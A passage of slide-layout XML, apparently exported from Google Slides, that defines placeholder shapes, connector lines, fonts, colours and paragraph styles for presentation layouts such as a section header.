            <a:lvl5pPr indent="-311150" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-311150" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-311150" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-311150" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-311150" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5001319" y="1320769"/>
            <a:ext cx="3419700" cy="336300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="730497"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="B9D8EB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Google Shape;145;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Google Shape;146;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="714900"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Google Shape;147;p14"/>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3_Section Header">
  <p:cSld name="13_Section Header">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="148" name="Shape 148"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="149" name="Google Shape;149;p15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="730497"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="B9D8EB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6905700" y="0"/>
            <a:ext cx="2238300" cy="4745700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000D74"/>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51" name="Google Shape;151;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Google Shape;152;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Google Shape;153;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="714900"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
